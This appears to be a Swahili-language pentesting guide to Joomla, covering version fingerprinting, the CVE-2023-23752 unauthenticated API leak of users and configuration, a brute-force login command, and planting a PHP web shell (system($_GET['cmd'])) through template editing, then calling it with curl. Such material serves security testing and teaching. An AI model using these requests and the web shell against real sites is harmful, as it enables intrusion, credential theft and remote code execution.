Joomla

Reading time: 4 minutes

Takwimu za Joomla

Joomla inakusanya takwimu za matumizi zisizo na majina kama vile mgawanyiko wa matoleo ya Joomla, PHP na hifadhidata na mifumo ya uendeshaji ya seva zinazotumika kwenye usakinishaji wa Joomla. Takwimu hizi zinaweza kuombwa kupitia API yao ya umma.

curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.tool

{
"data": {
"cms_version": {
"3.0": 0,
"3.1": 0,
"3.10": 6.33,
"3.2": 0.01,
"3.3": 0.02,
"3.4": 0.05,
"3.5": 12.24,
"3.6": 22.85,
"3.7": 7.99,
"3.8": 17.72,
"3.9": 27.24,
"4.0": 3.21,
"4.1": 1.53,
"4.2": 0.82,
"4.3": 0,
"5.0": 0
},
"total": 2951032
}
}

Enumeration

Discovery/Footprinting

• Angalia meta

curl https://www.joomla.org/ | grep Joomla | grep generator

<meta name="generator" content="Joomla! - Open Source Content Management" />

• robots.txt

# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
[...]

• README.txt

1- What is this?
* This is a Joomla! installation/upgrade package to version 3.x
* Joomla! Official site: https://www.joomla.org
* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging

Toleo

• Katika /administrator/manifests/files/joomla.xml unaweza kuona toleo.
• Katika /language/en-GB/en-GB.xml unaweza kupata toleo la Joomla.
• Katika plugins/system/cache/cache.xml unaweza kuona toleo la takriban.

Otomatiki

droopescan scan joomla --url http://joomla-site.local/

In 80,443 - Pentesting Web Methodology ni sehemu kuhusu skana za CMS ambazo zinaweza skana Joomla.

API Ufunuo wa Taarifa Bila Uthibitisho:

Matoleo Kuanzia 4.0.0 hadi 4.2.7 yana hatari ya ufunuo wa taarifa bila uthibitisho (CVE-2023-23752) ambayo itatoa creds na taarifa nyingine.

• Watumiaji: http://<host>/api/v1/users?public=true
• Faili ya Mipangilio: http://<host>/api/index.php/v1/config/application?public=true

Moduli ya MSF: scanner/http/joomla_api_improper_access_checks au script ya ruby: 51334

Brute-Force

Unaweza kutumia hii script kujaribu kufanya brute force kwenye kuingia.

sudo python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

admin:admin

RCE

Ikiwa umeweza kupata admin credentials unaweza RCE ndani yake kwa kuongeza kipande cha PHP code ili kupata RCE. Tunaweza kufanya hivi kwa kubadilisha template.

1. Bonyeza kwenye Templates chini kushoto chini ya Configuration ili kuleta menyu ya templates.
2. Bonyeza kwenye jina la template. Tuchague protostar chini ya kichwa cha safu ya Template. Hii itatuletea kwenye ukurasa wa Templates: Customise.
3. Hatimaye, unaweza kubonyeza kwenye ukurasa ili kuleta page source. Tuchague ukurasa wa error.php. Tutongeza PHP one-liner ili kupata utekelezaji wa code kama ifuatavyo:
4. system($_GET['cmd']);
5. Hifadhi & Funga
6. curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id

From XSS to RCE

• JoomSploit: Joomla Exploitation Script ambayo inaweza kuinua XSS hadi RCE au Uthibitisho Mwingine wa Kihatarishi. Kwa maelezo zaidi angalia hii posti. Inatoa msaada kwa Joomla Versions 5.X.X, 4.X.X, na 3.X.X, na inaruhusu:
• Privilege Escalation: Inaunda mtumiaji katika Joomla.
• (RCE) Built-In Templates Edit: Hariri Templates za Built-In katika Joomla.
• (Custom) Custom Exploits: Custom Exploits kwa Plugins za Tatu za Joomla.